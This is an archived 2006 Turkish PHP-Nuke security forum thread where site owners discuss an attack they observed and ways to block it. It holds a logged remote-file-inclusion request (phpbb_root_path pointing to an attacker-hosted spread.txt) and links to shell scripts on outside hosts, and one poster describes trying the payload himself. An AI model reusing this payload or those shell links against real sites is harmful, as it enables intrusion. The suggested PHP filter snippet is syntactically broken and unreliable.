Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 833
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4804 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(7990 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3362 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(9789 okuma, 10 yanıt)
 Nuke Sentinel..
(4425 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(4942 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3446 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(10108 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9306 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5191 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(41050 okuma, 45 yanıt)
 Bu bir saldırmı..
(8190 okuma, 7 yanıt)
 siteme virüs girmis..
(8310 okuma, 6 yanıt)
 Sitedekileri atmak..
(5224 okuma, 2 yanıt)
 Kötü botları engellemek...
(11202 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7182 okuma, 5 yanıt)
 index atılamayan site yap..
(7049 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5322 okuma, 2 yanıt)
 js trojandownloader.agent..
(5761 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7500 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(4949 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(5961 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(13925 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(26622 okuma, 25 yanıt)
 hacklendim mi?..
(6030 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(76694 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4478 okuma, 1 yanıt)
 Site neden Google i banla..
(4206 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6253 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7319 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7336 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(9902 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(7057 okuma, 5 yanıt)
 forum için kod yazma yasa..
(4961 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4741 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5300 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4793 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3467 okuma, 0 yanıt)
 Protector' deki Host İs..
(3478 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7584 okuma, 7 yanıt)
 index dosyasının chmod k..
(4061 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3635 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(7875 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4494 okuma, 1 yanıt)
 Nuke Güvenlik..
(159663 okuma, 257 yanıt)
 bütün index lere iframe e..
(18857 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5707 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(24400 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(18985 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3805 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Buradan saldırı geliyor
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Buradan saldırı geliyor

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
mutluedin
Mesaj: 200+
Mesaj: 200+





Kayıt: Aug 31, 2003
Mesajlar: 234
Konum: Kırklareli

MesajTarih: 2006-10-13, 22:20:22    Mesaj konusu: Buradan saldırı geliyor Alıntıyla Cevap Gönder

http://www.yagenoysentoplesen.com/qq.txt
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-06-17, 05:29:04    Mesaj konusu: Forum Arası Reklamlar


Başa dön
mutluedin
Mesaj: 200+
Mesaj: 200+





Kayıt: Aug 31, 2003
Mesajlar: 234
Konum: Kırklareli

MesajTarih: 2006-10-13, 22:21:27    Mesaj konusu: Alıntıyla Cevap Gönder

Bir de bu var:

http://www.yagenoysentoplesen.com/q.txt
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et
mutluedin
Mesaj: 200+
Mesaj: 200+





Kayıt: Aug 31, 2003
Mesajlar: 234
Konum: Kırklareli

MesajTarih: 2006-10-13, 22:24:02    Mesaj konusu: Alıntıyla Cevap Gönder

http://virtual.uarg.unpa.edu.ar/myftp/list.txt
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et
HunTürk
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Apr 17, 2005
Mesajlar: 1279
Konum: ANKARA

MesajTarih: 2006-10-14, 02:52:53    Mesaj konusu: Alıntıyla Cevap Gönder

Shell çalışıyorlar. Açık yoksa bir şey olmaz. Sentinel ya da mainfile yamalı ise sorun olmaz.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
mutluedin
Mesaj: 200+
Mesaj: 200+





Kayıt: Aug 31, 2003
Mesajlar: 234
Konum: Kırklareli

MesajTarih: 2006-10-15, 01:15:23    Mesaj konusu: Alıntıyla Cevap Gönder

NukeSentinel Kaydı

Date & Time: 2006-10-15 00:43:17
Blocked IP: 200.47.78.40
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.65
Query String: www.xxxxxxx.xxx/modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
Forwarded For: none
Client IP: none
Remote Address: 200.47.78.40
Remote Port: 57803
Request Method: GET
--------------------
Who-Is for IP
200.47.78.40




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: whois://whois.lacnic.net

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
NameServer: NS1.AFRINIC.NET
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see http://www.lacnic.net/ for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2005-12-05

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Whois Info
OrgTechPhone:
OrgTechEmail: whois-contact@lacnic.net


En son mutluedin tarafından 2006-10-15, 01:21:56 tarihinde değiştirildi, toplam 1 kere değiştirildi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et
HunTürk
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Apr 17, 2005
Mesajlar: 1279
Konum: ANKARA

MesajTarih: 2006-10-15, 01:21:21    Mesaj konusu: Alıntıyla Cevap Gönder

admin_board.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?

Tam bir lamermiş.:):) "phpbb_root_path" bunun ne olduğu hakkında bir fikti varmıydı acaba.:):)

Dert etmeyin dediğim gibi açık yoksa denesin dursunlar. Her gün aynı tip saldırıyı bende çok alıyorum.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2006-10-27, 22:07:19    Mesaj konusu: Alıntıyla Cevap Gönder

üst sürümlerde zaten çalışmıyor ancak bunun en iyi koruması forum/admin klasörüne şifre koymak. cpanel ve pleskpanelden yapıylaibliyor. htaccess lede yapılabilir
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
yenibir
Mesaj: 500+
Mesaj: 500+





Kayıt: Nov 08, 2005
Mesajlar: 757
Konum: Sivas

MesajTarih: 2006-10-27, 22:22:55    Mesaj konusu: Alıntıyla Cevap Gönder

En üstteki Verdiğin çift gg ile c o o k i e çalmaya çalışıyorlar diğeri local exploit dikkat et
sana zamanında uyarı yaptım ama dinlemiyorsunki kardeş

hostcunla görüş hostta ciddi açık var

Muhtemelen safe mod off //
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-06-17, 05:29:04    Mesaj konusu: Forum Arası Reklamlar


Başa dön
cemalsd
Mesaj: 1+
Mesaj: 1+





Kayıt: Oct 26, 2006
Mesajlar: 9

MesajTarih: 2006-10-28, 03:35:17    Mesaj konusu: Alıntıyla Cevap Gönder

Herkeze Merhaba,

www.xxxxxxx.xxx/modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?

İlgili bahsedilen saldırının ne gibi zararları vardır
Ben bu spread.txt yi kendi siteme yükleyip başka bir sitemde denedim gerçi ulaşılamayan sayfa çıktı ama bir ayrıntıyı gözden kaçırdığımı fark ettim
spread.txt içindeki "yagenoysentoplesen.com" değiştirmedim herhangi bir zararı olmuşmudur
(v.7.9)
Saygılar
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
lordi
Mesaj: 1+
Mesaj: 1+





Kayıt: Sep 23, 2006
Mesajlar: 15

MesajTarih: 2006-10-28, 05:29:10    Mesaj konusu: Re: Buradan saldırı geliyor Alıntıyla Cevap Gönder

Illegal Operation

hatası vermesi gerekli, 3.1 yamalı sürümler için geçerli
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
krall_13
Mesaj: 300+
Mesaj: 300+





Kayıt: Dec 31, 2005
Mesajlar: 354
Konum: Nereye...

MesajTarih: 2006-10-28, 12:22:41    Mesaj konusu: Alıntıyla Cevap Gönder

site üzeri shell calıstırmak icin yapılmıs sentinel kullananlar string bolümüne phpbb_root_path yazarlarsa korunurlar
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2006-10-28, 12:33:32    Mesaj konusu: Alıntıyla Cevap Gönder

yenibir :
En üstteki Verdiğin çift gg ile c o o k i e çalmaya çalışıyorlar diğeri local exploit dikkat et
sana zamanında uyarı yaptım ama dinlemiyorsunki kardeş

hostcunla görüş hostta ciddi açık var

Muhtemelen safe mod off //


safe_mode off fazla birşey ifade etmiyor önemli olan tehlikeli komutların php sisteminde disable_functions ile devre dışı bırakılmasıdır...

asp de php de bir sistemi tamaen kontrol etmeye yarayan komutları barındırmaktadır bunların tehlike arz edenlerini devre dışı bırakmadıkça problem olmaya devam edecektir...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
saho
Forum Yöneticisi
Forum Yöneticisi





Kayıt: Mar 18, 2005
Mesajlar: 2176
Konum: istanbul-tokat

MesajTarih: 2006-10-28, 17:00:18    Mesaj konusu: Alıntıyla Cevap Gönder

seyranlının söylediği gibi forum/admin şifrelenmeli yada
$_SERVER[query_string] deki veri kontrol edilip http:// , ftp:// gibi bir şey görürse
kodların çalışması die("güvenlik"); ve ya exit; gibi şekilde kodların çalışması engelleyebilirsiniz şöyle mesala
if ($_SERVER[query_string=="http://") { die("güvenlik engeli"); } gibi bir kod la mainfile.php den header.php den engellenebilir xss
ve ya bu tarz dizilerin hepsi bir array da toplanır sonra in_array fonksiyonu ile array da arama yaptırılıp yine " güvenlik engeli " ekrana göstertileiblir
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Saldırı yedim BW dolmuş. Nasıl kurtul... berkeratak Php Nuke Güvenlik 9 2009-12-16, 10:19:53 Son Mesajı Görüntüle
Yeni mesaj yok Forumları ziyaretçilere açtım ama bot... bcool Php-Nuke 3 2009-09-28, 00:10:40 Son Mesajı Görüntüle
Yeni mesaj yok Bu Hata Ne anlama Geliyor? Acil Yardı... sofualanli Linux Yönetimi 4 2009-08-18, 18:54:23 Son Mesajı Görüntüle
Yeni mesaj yok Saldırı Sonrası Admin ismi degişmiş emrahtavsan Php Nuke Sorunlarınız 2 2009-07-08, 17:25:58 Son Mesajı Görüntüle
Yeni mesaj yok CallerIP (saldırı tespit&#41; pro... Sergen Php Nuke Güvenlik 0 2009-05-18, 00:10:41 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright